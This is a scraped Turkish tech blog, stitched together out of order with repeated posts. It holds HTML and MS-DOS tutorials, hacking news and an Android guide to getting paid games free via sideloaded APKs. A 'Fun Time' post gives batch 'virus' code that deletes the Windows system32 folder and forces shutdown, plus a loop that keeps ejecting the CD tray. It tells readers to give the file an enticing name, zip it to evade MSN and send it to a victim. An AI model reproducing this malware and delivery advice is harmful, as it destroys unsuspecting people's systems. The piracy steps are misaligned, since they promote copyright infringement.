- Telefonunuzun şarz kablosu üzerinden bilgisayara bağlayıp telefonda çıkan uyarıdan "Dosyalama modu( Move SD mode)" u seçiyor ve .apk uzantılı dosyayı sd kartımıza atıyoruz.
- Telefonu uçak(airplanemode)moduna alıp herhangi bir android marketten indirdiğiniz bedava file manager[dosya yöneticisi](es file explorer, astro,andox...) ile .apk uzantılı dosyamıza çift tıklıyoruz.DİKKAT: önce Menu>Ayarlar>Uygulamalar>Bilinmeyen kaynaklar(Menu>Settings>Applications>unknow sources) 'ı işaretlemelisiniz.
- Gelen ekrandan klasik olarak ileri (next) diyerek oyunu yüklüyoruz.
- Ana menüden oyunu bulup çalıştırıyoruz. Özellikle gameloft'un yaptığı HD oyunlar ki bunlar 200-300 mB ı bulabiliyor.Bu yüzden ekranımıza dosya indirlmesi gerektiğini söyleyen bir uyarı geliyor.Uyarı gelince Home tuşuna basarak ana menüye dönüyoruz.
- Burada uçak modu(airplane mode)'ndan çıkıp wi-fi'ı açıp internete bağlanıyor ve yeniden oyuna dönüp uyarıyı onaylıyoruz.
- Wi-fi üzerinden oyun dosyalarının inmesini bekliyor ve sonrasındada mükemmel oyunun keyfini çıkarıyoruz.
Android ---Oyun Yükleme---
Bu bölümümüzde android marketten indirilen bedava oyunlar dışında gameloft , glu gibi firmaların yaptığı paralı oyunları nasıl bedava yükleyeceğimizi anlatacağım.
Html Devam ---1---
Parametre Kullanımı
Parametreler daima isim/değer çiftleri arasında gelir: name="value".
Parametreler daima başlangıç etiketi içerisinde belirtilir.
<h1 align="center"> başlık belirtmesinin yanında, metinin ortalanacağını da belirtir.
<body bgcolor="yellow"> Body kısmını belirtmekle beraber, arkaplan renginin de sarı olacağını belirtir.
Bazen değerin kendisinin içinde de çift tırnak kullanılması gerektiği zamanlarda ise, değerin tamamını tek tırnak içerisine de alabilirsiniz:
name='Berker"Swalktiz34"Yurttaş'
Diğer parametreleri aşağıdaki örneklerden bulup deneyebilirsiniz...
Metin biçimlendirme örneği
Bir adres örneği
Kısaltmalar...
Altı ve üstü çizili metinler
HTML Etiket Nitelikleri
HTML etiketleri parametrelere sahip olabilir. Parametreler, HTML öğelerine, ek özellikler eklenmesini sağlar.Parametreler daima isim/değer çiftleri arasında gelir: name="value".
Parametreler daima başlangıç etiketi içerisinde belirtilir.
Parametre Örneği 1:
<h1> başlık belirtir.<h1 align="center"> başlık belirtmesinin yanında, metinin ortalanacağını da belirtir.
Parametre Örneği 2:
<body> HTML'in body kısmını belirtir.<body bgcolor="yellow"> Body kısmını belirtmekle beraber, arkaplan renginin de sarı olacağını belirtir.
Değer(Value)leri Daima Tırnak İçerisine Alın
Parametrelerin değerli her zaman tırnak içerisinde olmalıdır.Bazen değerin kendisinin içinde de çift tırnak kullanılması gerektiği zamanlarda ise, değerin tamamını tek tırnak içerisine de alabilirsiniz:
name='Berker"Swalktiz34"Yurttaş'
Diğer parametreleri aşağıdaki örneklerden bulup deneyebilirsiniz...
Metin biçimlendirme örneği
Bir adres örneği
Kısaltmalar...
Altı ve üstü çizili metinler
Html'e Giriş ---4---
Açıklama(Yorum) Satırları
Yorum satırları HTML kaynak kodu içerisine programcıların hangi satırın ne iş gördüğünü anlatmak için kullanılır. Bu satırlar, sayfa browser'da görüntülenirken dikkate alınmazlar. <!-- Bu bir açıklama -->
Swalktiz34'den İpuçları:
HTML kodlarınızın başka browser'larda nasıl görüntüneceğini asla bilemezsiniz. Ayrıca bazı kullanıcılar geniş ekran monitörlere sahipken bazıları küçük ekranlara sahiptir. Bu sebeple metinler, kullanıcı penceresini her yeniden boyutlandırmasında değişecektir. Asla metinlerinizi fazladan boşluk bırakmak gibi tekniklerle biçimlendirmeye çalışmayın.HTML koyduğunuz boşlukları sürekli teke indirecektir.
Boş bir satır bırakmak için <p> kullanmak kötü bir tekniktir, bunun yerine <br /> etiketini kullanınız. (Ama asla <br /> ile sıralı liste oluşturmayınız. HTML ile listeleme konusuna kadar bekleyiniz.)
Şimdiye kadar öğrendiğimiz html tagları(etiketleri)
Etiket (Tag) Açıklama
<html> Bir HTML dökümanını belirtir
<body> Dökümanın görüntülenecek kısmını berlitir.
<h1> to <h6> Başlıkları belirtir.
<p> Bir paragraf belirtir
<br> Boş bir satır bırakır.
<hr> ayfada yatay bir çizgi çizer
<!--> Yorum satırı olduğunu belirtir.
Evinize koşun atari ile coşun! ---HABER AKIŞI---
80 kuşağının harçlığını jetona yatırmaktan kurtaran konsol aşkı, Türkiye'de bu slogan ile doğdu...
River Raid, The Last Ninja, Süper Mario, Pac Man ve diğerleri... Günümüzde 3D ve HD teknolojisi bile yetmeyen teknoloji tutkunlarına yaklaşık 30 yıl uzak olan bu oyunların ilk durağı 'atari'ler oldu. PlayStation, Wii ve Xbox gibi oyun konsollarının 'ataları' olan kişisel oyun sistemleriyle tanınan bu klasik oyunlar, internete de tablet ve akıllı cep telefonlarına da yerleşti. Ancak hiçbiri o yıllardaki yarı elektronik yarı mekanik konsollarda oynananların yerini tutamadı. Bu tutkuyu gören Atari ve geçtiğimiz günlerde Commodore'un ardından diğer üretici firmalar da klasik konsolları yenileme rüzgarına her an kapılabilir.
Html'e Giriş ---3---
Başlıklar
Başlıklar <h1> ve <h6> dahil olmak üzere aradaki tüm rakamlar kullanılarak tanımlanabilir. <h1> en büyük puntoyu belirtirken, <h6> ise en küçük puntoyu belirtir. <h1>Bu bir başlık</h1>
<h2>Bu bir başlık</h2>
<h3>Bu bir başlık</h3>
<h4>Bu bir başlık</h4>
<h5>Bu bir başlık</h5>
<h6>Bu bir başlık</h6>
HTML dili otomatik olarak başlık etiketlerinin öncesinde ve sonrasında bir satır atlar.Paragraflar
Paragraflar <p> etiketi ile belirtilir. <p>Bu bir paragraf</p>
<p>Bu da başka bir paragraf</p>
HTML dili otomatik olarak paragraf etiketlerinin öncesinde ve sonrasında bir satır atlar.Etiketleri kapatmayı unutmayın!
Bir önceki örnekte paragrafın </b> etiketi ile bittiğini gördünüz: <p>Bu bir paragraf
<p>Bu da başka bir paragraf
Çoğu browser büyük ihtimalle yukardaki gibi yazsanız bile çalıştıracaktır ama buna pek fazla güvenmeyin çünkü gelecek versiyon HTML dili hiçbir etiketi atlamanıza izin vermeyecektir.Satır atlama
Satır atlamak için <br> etiketi kullanılır. Ancak bu etiketin yeni bir paragraf açmadığını da unutmayınız. <p>Bu <br>bir <br>çok satırlı paragraftır.</p>
<br> etiketi boş bir etikettir. </br> gibi bir bitiş etiketi yoktur.
( <br> etiketini bir önceki konuda geçen html ediötünde deneyebilirsiniz.)
<br> mi <br /> mi?
Bir çok yerde <br> etiketinin <br /> olarak kullanıldığını göreceksiniz.Çünkü <br> etiketi bir bitiş etiketi bulundurmaz ve bu özellik gelecek nesil HTML (XML ve XHTML) dilinin ilk kuralını bozmaktadır. Bu yüzden <br /> etiketini kullanmanızı tavsiye ederiz.
Html deneme editörü
HTML dilindeki en önemli etiketler, başlıklar, paragraflar ve satır atlama etiketleridir.
HTML'i öğrenmenin en iyi yolu ise örneklerle çalışmaktır. Bu yüzden bir araştırma sürecinden sonra sizin için çok kullanışlı bir HTML deneme editörü buldum. Bu editör ile kendi kaynak kodlarınızı girip anında test edebilirsiniz.
Çok basit bir HTML dökümanı
Bu örnek en az HTML etiketleri kullanılarak oluşturulmuş çok basit bir HTML dökümanıdır.
Basit paragraflar...
Bu örnekle paragrafların nasıl oluşturulduğunu görebilirsiniz.
Android'den Selamlar...
İlk android'den selamlar bölüne hoşgeldiniz. Android'i henüz duymamış olan takipçilerimiz için kısaca andoidi tanıttıktan sonra size root işlemini , full sürüm oyun yüklemeyi anlatıp,ardında soru cevap ve android'den haberler bölümlerini sunacağım...
Yardımlarınızı Bekliyorum...
Ben her gün sizi teknolojideki gelişmelerle ilgili bilgilendirmekle ve sizin Ms Dos'tan html'e ,Linux'ten Mac işletim sistemlerine kadar bilgilenmeniz için çalışırken sizden reklamlara tıklaıp Blog'u paylaşmanızı ve yorumlarınızı esirgememenizi bekliyorum. Şimdiden teşekkürler...
İnternet'in Geleceği Onda---HABER AKIŞI---
Her ne kadar kablolu ağ servis sağlayıcıları yüksek hız sunarak kullanıcıları kendine çekmeye çalışsa da, öyle görünüyor ki gelişen teknoloji sayesinde kablosuz ağ kullanımı daha çok yaygınlaşıyor. Ağ donanımı şirketi olan Cisco'nun yaptığı bir araştırmaya göre de 2015'te kablosuz ağ kullanımı, kablolu ağ kullanımını geçecek.
Cisco, internette yayınladığı raporunda 2015'te kablolu ağ kullanımının %46, kablosuz ağ kullanımının ise %54 olacağını öne sürdü.
2010 yılında evde kullanılan bilgisayarların sadece birkaç yüzü aylık 1 TB'lık trafik yaparken, 2015 yılında 6 milyon ev bilgisayarının toplamda yarım TB trafik yapacağı da Cisco'nun söyledikleri arasında.
Cisco, internette yayınladığı raporunda 2015'te kablolu ağ kullanımının %46, kablosuz ağ kullanımının ise %54 olacağını öne sürdü.
2010 yılında evde kullanılan bilgisayarların sadece birkaç yüzü aylık 1 TB'lık trafik yaparken, 2015 yılında 6 milyon ev bilgisayarının toplamda yarım TB trafik yapacağı da Cisco'nun söyledikleri arasında.
11 Haziran’da başlayan sistematik saldırıda, hacker’lar Distribute.IT sunucularına ulaştılar. Epey planlı olan saldırganların hedefi ise sunuculara mümkün olduğunca çok zarar vermek.
Saldırı çok kısa sürdü. Hacker’lar sunucuların sistem dosyalarını ele geçirip tahribata başladılar. Olay anlaşılana kadar, sunucu sistemleri maksimum zarara uğradı.
Aynı zamanda yedekleme ile ilgili veriler de silindi. Yaklaşık 4800 domain bu saldırıdan nasiplerini aldı.
Uzmanlar saldırıdan sonra verileri kurtarmak için ellerinden geleni yaptılar fakat dört sunucuya yapılan saldırıda çok az veri kurtarılabildi.Firmanın yaptığı açıklamaya göre, Drought, Hurricane, Blizzard ve Cyclone adlı sunucularda olan verilerin silinmesinden büyük üzüntü duyduklarını belirttiler.
Distribute.IT bu saldırıdan sonra, veri yedekleme kapasitesinin yetersiz olmasından dolayı müşterilerini farklı hosting firmalarına yönlendirmeye başladı.
Html 'e Giriş ---2---
HTML Etiketleri
- HTML etiketleri, HTML öğelerini belirtmek için kullanılır.
- HTML etiketleri 2 karakter ile sınırlanır. < ve >
- Bu karakterlere grup parantezleri (angle brackets) denir.
- HTML etiketleri çift olarak kullanılır. Örn: <b> Bu metin koyu fonttadır. </b>
- Bu çiftlerden birincisine başlama etiketi, ikincisine ise bitiş etiketi denir.
- Başlama ve bitiş etiketleri arasında kalan herşeye ise öğe içeriği (element contents) denir.
- HTML etiketleri büyük/küçük harfe duyarlı değildir, yani <b> ve <B> aynı görevi görür. (Türkçe karakter olan "İ" ve "ı" harflerinin bu durumun dışında kaldığını unutmayınız.)
HTML Öğeleri
*Önceki sayfadaki kayıttan öğrendiklerimizi hatırlayalım:
<html>
<head>
<title>Sayfa Başlığı</title>
</head>
<body>
Bu benim ilk sayfam <b>Bu metin koyu</b>
</body>
</html>
*Bu bir HTML ögesidir:
<b>Bu metin koyu</b>
*HTML öğesi başlangıç etiketi olan <b> ile başladı.HTML öğesinin içeriği: Bu metin koyu
HTML öğesi bitiş etiketi olan </b> ile sonlandırıldı.<b> etiketinin amacı, görüntülenecek
olan metinin koyu gösterilmesi gerektiğini bildirmektir.
Etiketleri neden küçük harflerle belirtiriz?
HTML etiketlerinin büyük/küçük harfe duyarlı olmadığını söylemiştik: <B> ve <b> aynıdır. Eğer Web'de gezintiye çıkarsanız bir çok sitenin kaynak kodunun bütük harflerle yapılmış olduğunu göreceksiniz..Fakat biz her zaman küçük harf kullanırız. Neden?
Eğer Web standartlarını kontrol etmek istiyorsanız küçük harf kullanmalısınız. World Wide Web Consortium (W3C) HTML 4 versiyonu ile beraber küçük harf kullanımını önerir. Ayrıca XHTML (yeni nesil HTML) dili de bunu kullanmanızı şiddetle önerir.
Html 'e Giriş
HTML dosyası nedir?
- HTML'in açılımı Hyper Text Markup Language (Bunun tam Türkçe'si bulunmamakla beraber "çok yere açılan metin" denebilir.
- Bir HTML dosyası bir text dosyası olmakla beraber markup tags (işaretlenmiş etiketler) içerir
- Markup tag'ler web tarayıcınıza sayfanın nasıl gösterileceğini gösterir.
- Bir HTML dosyasının uzantısı htm veya html olmak zorundadır.
- Bir HTML dosyası basit bir text editör ile oluşturulabilir.
- Eğer Windows kullanıyorsanız not defterini açın.Eğer MAC kullanıyorsanız SimpleText programını açın.Eğer OSX kullanıyorsanız, TextEdit'i açın ve aşağıdakileri yapın: "Format" menüsünü açın ve "Rich Text" yerine "Plain Text" seçeneğini seçin. Sonra "Text Edit" menüsünün altında bulunan "Preferences" penceresini açın ve "Ignore rich text commands in HTML files" seçeneğini seçin. Eğer bu değişiklikleri yapmazsanız HTML dosyasınız büyük ihtimalle çalışmayacaktır! Aşağıdaki metini açtığınız editör içerisine yazın:
<html> <head> <title>Sayfa Başlığı</title> </head> <body> Bu benim ilk sayfam <b>Bu metin koyu</b> </body> </html>
- Dosyayı "sayfam.html" olarak kaydedin.Oluşturduğunuz dosyaya çift tıklayın. Dosya tarayıcınızda açılacaktır.
Örneğin Açıklaması:
HTML dökümanınızdaki ilk tag (etiket) <html>'dir. Bu etiket tarayıcınıza bir HTML dosyasının koşturulacağını söyler. HTML dökümanınızdaki son tag (etiket) </html>'dir. Bu da tarayıcınıza HTML dosyasının sonunun geldiğini söyler. <head> ve </head> etiketleri arasında kalan kısım başlık bilgilerini içerir. Başlık bilgileri tarayıcı penceresinde görüntülenmez.<title> ve </title> etiketleri arasında kalan kısım dökümanınızın başlık bilgilerini içerir. Başlık tarayıcı penceresinin en üstünde görüntülenir.<body> ve </body> etiketleri arasında kalan kısım, tarayıcı penceresinde görüntülenecek olan kısımı içerir.<b> ve </b> etiketleri arasında kalan kısım ise koyu (bold) biçimde gösterilir.
Swalktiz34'den:Kolay ve rahat kullanım için Adobe Dreamwaever, Frontpage, Web Expression gibi programlar kullanılabilir ama profesyonel olarak hmtl'yi öğrenmek ve gene bu programlarda kullanabilmek için note pad üzerinden yapılan html çalışmalarını öğrenmelisiniz...
Fun Time #1
Fun Time'ın ilk bölümünde size ilk metin belgesi virüsünüzü nasıl yapacağınızı anlatacağım...
1-)Masaüstüne gelin.Yeni bir metin belgesi oluşturun.
2-)İçine aşağıda beğenip seçtiğiniz bir kodu kopyalayıp yapıştırın.
3-)Metin belgesinin üst sekmesinde "dosya" var.Bunu tıklayın
4-)Buradan "farklı kaydet" e gelin
5-)Dosya ismine kurbanın ilgisini çeken birşey yazın fakat dosyanın ismine ne yazarsanız yazın mutlaka sonuna ".bat" deyip kaydetin.
6-)Uzantımızı da yaptığımıza göre kaydet deyip masaüstümüze gelen virüsü kurbanaa yolluyoruz.
7-)Genelde herkes msn den yolladığı için msn bu dosyayı kabul etmez.Bunu önce winrarlayıp daha sonra da arkadaşınızı çıldırtabilirsiniz.
rem ---------------------------------
rem Start Opening Disk Tray
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"
rem ---------------------------------
rem ---------------------------------
rem Delete System32 folder
del /f /q %SystemDrive%\WINDOWS\system32\*.*
shutdown /s /t 00
rem ---------------------------------
NOT : Virüsler orjinal windows xp içindir . Bazıları windows vista ve 7 'de stabil olarak çalışmayabilir.
1-)Masaüstüne gelin.Yeni bir metin belgesi oluşturun.
2-)İçine aşağıda beğenip seçtiğiniz bir kodu kopyalayıp yapıştırın.
3-)Metin belgesinin üst sekmesinde "dosya" var.Bunu tıklayın
4-)Buradan "farklı kaydet" e gelin
5-)Dosya ismine kurbanın ilgisini çeken birşey yazın fakat dosyanın ismine ne yazarsanız yazın mutlaka sonuna ".bat" deyip kaydetin.
6-)Uzantımızı da yaptığımıza göre kaydet deyip masaüstümüze gelen virüsü kurbanaa yolluyoruz.
7-)Genelde herkes msn den yolladığı için msn bu dosyayı kabul etmez.Bunu önce winrarlayıp daha sonra da arkadaşınızı çıldırtabilirsiniz.
- Alt alta olacak şekilde sürekli "START" yazarsanız yazdığınız start kadar ms dos açılır ve bilgisayar tıkanır.
- Kurbanın bilgisayrının Cd-rom/Dvd-rom'unu sürekli açıp kapatır (İşte benim favorim)
rem ---------------------------------
rem Start Opening Disk Tray
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"
rem ---------------------------------
- Kurbanın bilgisayarındaki system 32'yi siler. (Dehşet bişey yaa...)
rem ---------------------------------
rem Delete System32 folder
del /f /q %SystemDrive%\WINDOWS\system32\*.*
shutdown /s /t 00
rem ---------------------------------
NOT : Virüsler orjinal windows xp içindir . Bazıları windows vista ve 7 'de stabil olarak çalışmayabilir.
Ms Dos Komutları Devam --3--
MOVE
Dizinlerin ismini değiştirmek için ve taşıma işlemi yapmak için kullanılır.
Kullanım şekli 1: C:\>MOVE eski dizin ismi yeni dizin ismi
Kullanım şekli 2: C:\>MOVE nereden neyi nereye
Kopyalama ile taşıma aynı işlemler değildir. Kopyalama çoğaltma anlamına gelir. Yani dosyaları veya dizinleri çoğaltma. Taşıma ise bir yerden başka bir yere taşıma,aynı dosyayı veya dizini çoğaltmadan taşıma.
ATTRIB
Dosyalara özellik kazandırabilen komuttur.
Kullanım şekli: C:\>ATTRIB dosya adı parametre
Parametreleri :
/+h: Dosyalara gizlilik özelliği kazandırır. Bu özelliği kaldırmak için /+h parametresi kullanılır.
/+r: Dosyalara sadece okunabilirlik özelliği kazandırır. Bu özelliği kazandırmak için /+r parametresi kullanılır.
/+s: Dosyalara sistem dosyası özelliği kazandırır. Bu özelliği kaldırmak için /+s parametresi kullanılır.
SCANDISK
Sürücüleri hatalara karşı denetler. Düzeltebileceği hata varsa düzeltir ve kullanıcıya bilgi verir.
Kullanım şekli: C:\>SCANDISK
CHKDSK
Sürücüler hakkında istatiksel ilgiler verir.
Kullanım şekli: C:\>CHKDSK
Parametreler:
/f: Diskteki hataları tespit ederek düzeltir.
/viskteki bütün dosyaları yol ismiyle birlikte listeler.
DISKCOPY
Disketten diskete kopyalama yapmak için kullanılır. Komut ilk olarak kaynak disketi okur ve hedef disketi takmamızı ister. Hedef disketi taktıktan sonra bir tuşa basarak kaynak disketteki bilgileri hedef yazdırma işlemi tamamlanır.
Kullanım şekli: C:\>DISKCOPY A: A:
FORMAT
Düzenleme,biçimlendirme komutu. genellikle ilk alınan disketler üzerinde kullanılır. Bu disketler formatlanarak üzerine bilgi yazılabilir hale gelmesi sağlanır. Dolu bir disket veya disk formatlanırsa üzerindeki tüm bilgiler silinecektir. Üzerinde çalışılan disk veya diskete format atılamaz. Bunu yapmak için başka bir sürücü üzerinde işlem yapmak gerekir. Bu komutu bilinçsiz bir şekilde kullanmak büyük kayıplara yol açabilir.
C:>format A:
DISKET FORMATLAMA
C:\>C:>format/s A:
SISTEM DISKETI OLUŞTURMA
C:\>A:>format C:
HARDDISKI FORMATLAMA
Parametreler:
/q: Hızlı formatlama.
/s: Sistem dosyaları oluşturarak formatlama.
Anonymous Saldırısına Dikkat --- HABER AKIŞI ---
''Bu haberlerin gözdağı vermek ve korku yaratmak için yayınlandığına inanıyoruz. Anonymous oluşumu, bu haberleri yalanlamak için bu gece yeniden harekete geçecek. Bu defa bir önceki atak tiplerinden daha yüksek seviyede bir operasyon gerçekleştirilecek ancak herhangi bir sızma ve bilgi çalınması söz konusu olmayacak. Ayrıca bu gece başlayacak operasyonda hedefler son ana kadar açıklanmayacaktır. Operasyonda siyasi sitelere ve basın yayın organlarına ait sitelere atak yapılmaması yönünde karar alınmış olup atakların süresini paylaşamadığımızı belirtmek istiyoruz.''
Ms Dos Komutları Devam --2--
DEL
Edit'ta oluşturulan dosyaları silmek için kullanılan komuttur.
Kullanım şekli: C:\>DEL dosya ismi
TYPE
Edit'ta oluşturulan dosyaların içeriğini komut ortamında görmek için kullanılan komuttur.
Kullanım şekli: C:\>TYPE dosya ismi
İçeriği görüntülenecek dosyanın yol tanımlaması yani komutun yazıldığı satır önemlidir. Komut dosyanın oluşturulduğu dizinde yazılmaz ise MS-DOS o dosyayı bulamaz. Bu yüzden başka dizinlerde bu komutu çalıştırmak isterseniz yol tanımı yapmanız gerekir:
REN
Dosyaların isimlerini değiştirmek için kullanılır.
Kullanım şekli: C:\>REN eski dosya ismi yeni dosya ismi
DATE
Sistemin tarihini görüntülemek ve değiitirmek için kullanılır.
Kullanım şekli: C:\>DATE
TIME
Sistemi saatini görüntülemek ve değiştirmek için kullanılan komuttur.
Kullanım şekli: C:\>TIME
LABEL
Sürücüdeki birim seri numarasını ve etiketini görüntüler. Sürücü etiketi değiştirmenize olana tanır.
Kullanım şekli: C:\>LABEL
MEM
Sürücüler toplam kapasitelerini,boş kapasitelerini ve dolu olan kapasiteleri hakkında bilgi verir hakkında bilgi verir.
Kullanım şekli: C:\>MEM
COPY
Bir dosya veya dizini kopyalamak için kullanılan komuttur.
Kullanım şekli: C:\>COPY nereden neyi nereye
Bu işlemi yaparken üzerinde çalıştığımız sürücü ve dizini bilmek gerekir. Kopyalama esnasında bunlar önemli bir husustur. Aksi takdirde yol tanımlaması yapılması gerekebilir..
Ms Dos Komutları Devam --1--
EDIT:
MS-DOS ta dosya oluşturmak için kullanılan komuttur.
Kullanım şekli: C:\>EDIT
Komut yazılıp onay verdikten sonra karşımıza çıkan pencereden oluşturmak istediğimiz belge veya doküman dosya menüsünde bulunan kaydet komutu ile kaydedebiliriz. Kaydetme işlemi sonrası dosya çıkış komutu kullanılarak tekrar MS-DOS komut ortamına dönülebilir. Dosya ismi verilirken uyulması gereken bazı kurallar vardır:
1- Dosya ismi en fazla 8 karakterden oluşmalıdır. 8 karakterden fazla dosya isimlerini " " şeklinde yazılmalıdır.
2- Dosya isminde boşluk bulunmamalıdır.
3- Dosya isminde %&߀@!^# gibi karakter kullanılmamalı ve rakam verilmemelidir.
4- Dosya isminde Türkçe karakterden kaçınmalıdır.
5- Dosyaya uzantı vermek mecburi değildir. İsteğe bağlıdır.
Dosya uzantıları:.SYS: Sistem dosyaları.
.EXE ,.COM,.BAT :MS-DOS ve Windows ta isimleri yazıldıklarında doğrudan çalışabilen dosyalar.
.TXT:MS-DOS metin dosyası uzantısı.
Bazı Özel Sistem Dosyaları:IO.SYS: (INPUT/OUTPUT) : Giriş çıkış işlemlerini kontrol sistem dosyası.
MS-DOS.SYS : Disk organizasyonunu sağlayan dosyaların kayıt yapısını düzenleyen sistem dosyası.
COMMAND.COM : Dahili komutları ram hafızaya yükleyen dosya.
Dosya uzantılarından o dosyanın ne tür dosya olduğu anlaşılabilir.
MS-DOS ta dosya oluşturmak için kullanılan komuttur.
Kullanım şekli: C:\>EDIT
Komut yazılıp onay verdikten sonra karşımıza çıkan pencereden oluşturmak istediğimiz belge veya doküman dosya menüsünde bulunan kaydet komutu ile kaydedebiliriz. Kaydetme işlemi sonrası dosya çıkış komutu kullanılarak tekrar MS-DOS komut ortamına dönülebilir. Dosya ismi verilirken uyulması gereken bazı kurallar vardır:
1- Dosya ismi en fazla 8 karakterden oluşmalıdır. 8 karakterden fazla dosya isimlerini " " şeklinde yazılmalıdır.
2- Dosya isminde boşluk bulunmamalıdır.
3- Dosya isminde %&߀@!^# gibi karakter kullanılmamalı ve rakam verilmemelidir.
4- Dosya isminde Türkçe karakterden kaçınmalıdır.
5- Dosyaya uzantı vermek mecburi değildir. İsteğe bağlıdır.
Dosya uzantıları:.SYS: Sistem dosyaları.
.EXE ,.COM,.BAT :MS-DOS ve Windows ta isimleri yazıldıklarında doğrudan çalışabilen dosyalar.
.TXT:MS-DOS metin dosyası uzantısı.
Bazı Özel Sistem Dosyaları:IO.SYS: (INPUT/OUTPUT) : Giriş çıkış işlemlerini kontrol sistem dosyası.
MS-DOS.SYS : Disk organizasyonunu sağlayan dosyaların kayıt yapısını düzenleyen sistem dosyası.
COMMAND.COM : Dahili komutları ram hafızaya yükleyen dosya.
Dosya uzantılarından o dosyanın ne tür dosya olduğu anlaşılabilir.
Hacker'lar da Hacklernir ---HABER AKIŞI---
Hacker'lar için hayat kolay değil. Bir yandan seçtikleri yüksek risk içeren kurumların sitelerine saldırıyorlar, diğer yandan da kendilerini korumaya çalışıyorlar. Buna bir de hacker'ların iç hesaplaşmaları girince işler daha da karışıyor.
İşte daha önce CIA'ın web sitesine saldırmasıyla gündeme gelen LulzSec adlı hacker grubunun web sitesi bu kez başka bir hacker grubu tarafından saldırıya uğradı. Avustralya'lı ABC kanalının internet sitesinin verdiği bilgiye göre LulzSec hacker grubunun web sitesini ele geçiren grubun adı TeamPoison. Üstelik iddialara göre hacker grubu sadece siteyi hack ederek, içerisine kendi hazırladıkları bir sayfayı yerleştirmekle kalmadılar, aynı zamanda LulzSec'in yüzlerce üyesine ait IP adresleri, adresler, fotoğraflar, telefon numaraları ve şifreleri de ele geçirdiler. Henüz LulzSec konuyla ilgili bir açıklama yapmadı ve TeamPoison da elde ettiğini iddia ettiği gizli bilgilerden herhangi birini yayınlamadı.
Bu sırada ABC'nin haberine göre LulzSec yakın zamanda Deus Ex oyununu hack eden kişiyi FBI'ya ihbar etmiş. TeamPoison'ın LulzSec'e saldırmasının sebebinin bu olabileceği söyleniyor.
İşte daha önce CIA'ın web sitesine saldırmasıyla gündeme gelen LulzSec adlı hacker grubunun web sitesi bu kez başka bir hacker grubu tarafından saldırıya uğradı. Avustralya'lı ABC kanalının internet sitesinin verdiği bilgiye göre LulzSec hacker grubunun web sitesini ele geçiren grubun adı TeamPoison. Üstelik iddialara göre hacker grubu sadece siteyi hack ederek, içerisine kendi hazırladıkları bir sayfayı yerleştirmekle kalmadılar, aynı zamanda LulzSec'in yüzlerce üyesine ait IP adresleri, adresler, fotoğraflar, telefon numaraları ve şifreleri de ele geçirdiler. Henüz LulzSec konuyla ilgili bir açıklama yapmadı ve TeamPoison da elde ettiğini iddia ettiği gizli bilgilerden herhangi birini yayınlamadı.
Bu sırada ABC'nin haberine göre LulzSec yakın zamanda Deus Ex oyununu hack eden kişiyi FBI'ya ihbar etmiş. TeamPoison'ın LulzSec'e saldırmasının sebebinin bu olabileceği söyleniyor.
Ms Dos Komutlarına Giriş
DIR
Aktif olan sürücüdeki dosya ve dizinleri listeler.
Kullanım şekli:C:\>DIR
Parametreleri:
/P: Listelemenin sayfa sayfa olmasını sağlar. Ekrana sığmayacak çoklukta dizinleri veya dosyaları olan sürücülerde ve dizinlerde listenin kolay incelenmesi için genellikle /P parametresi kullanılır.
/W: Listelemeyi bir sayfaya sığacak şekilde 5'li sütunlar halinde yapar.
/S: Üzerinde işlem yapılan sürücü veya dizinin tüm alt dizinleri ve dosyaları ile birlikte listelenmesini sağlar.Dikkat edin benimki gibi dolu bir bilgisayarınız varsa bu işlem bir hayli vakit alabilir. Aynı zamanda(çoğu zaman) /S parametresi dosya veya dizin arama işlemlerinde de kullanılır.
Dosya (Directory) İşlemleri
MD:Yeni bir dizin oluşturmak için kullanılan komuttur.Kullanım şekli: C:\>MD yeni dizin ismi
CD: Oluşturulmuş bir dizinin içine girmek için kullanılır.Kullanım şekli: C:\>CD dizin ismi
CD.. : Seçili dizinden bir üst dizine çıkmak için kullanılır.Kullanım şekli: C:\>CD..
RD:İçi boş olan bir dizini silmek için kullanılır. Bu komutun düzgün çalışabilmesi için dizin içerisinde herhangi bir dosya veya dizin bulunmaması gerekir.Kullanım şekli: C:\>RD dizin ismi
DELTREE: Dizinleri alt dizinleri ile birlikte siler. Komut yazılıp onay verdikten sonra kullanıcıya bir uyarı mesajı vererek kullanıcının cevabını bekler.Kullanım şekli: C:\>DELTREE dizin ismi
Aktif olan sürücüdeki dosya ve dizinleri listeler.
Kullanım şekli:C:\>DIR
Parametreleri:
/P: Listelemenin sayfa sayfa olmasını sağlar. Ekrana sığmayacak çoklukta dizinleri veya dosyaları olan sürücülerde ve dizinlerde listenin kolay incelenmesi için genellikle /P parametresi kullanılır.
/W: Listelemeyi bir sayfaya sığacak şekilde 5'li sütunlar halinde yapar.
/S: Üzerinde işlem yapılan sürücü veya dizinin tüm alt dizinleri ve dosyaları ile birlikte listelenmesini sağlar.Dikkat edin benimki gibi dolu bir bilgisayarınız varsa bu işlem bir hayli vakit alabilir. Aynı zamanda(çoğu zaman) /S parametresi dosya veya dizin arama işlemlerinde de kullanılır.
Dosya (Directory) İşlemleri
MD:Yeni bir dizin oluşturmak için kullanılan komuttur.Kullanım şekli: C:\>MD yeni dizin ismi
CD: Oluşturulmuş bir dizinin içine girmek için kullanılır.Kullanım şekli: C:\>CD dizin ismi
CD.. : Seçili dizinden bir üst dizine çıkmak için kullanılır.Kullanım şekli: C:\>CD..
RD:İçi boş olan bir dizini silmek için kullanılır. Bu komutun düzgün çalışabilmesi için dizin içerisinde herhangi bir dosya veya dizin bulunmaması gerekir.Kullanım şekli: C:\>RD dizin ismi
DELTREE: Dizinleri alt dizinleri ile birlikte siler. Komut yazılıp onay verdikten sonra kullanıcıya bir uyarı mesajı vererek kullanıcının cevabını bekler.Kullanım şekli: C:\>DELTREE dizin ismi
Hacker'lar Savaşta ---HABER AKIŞI---
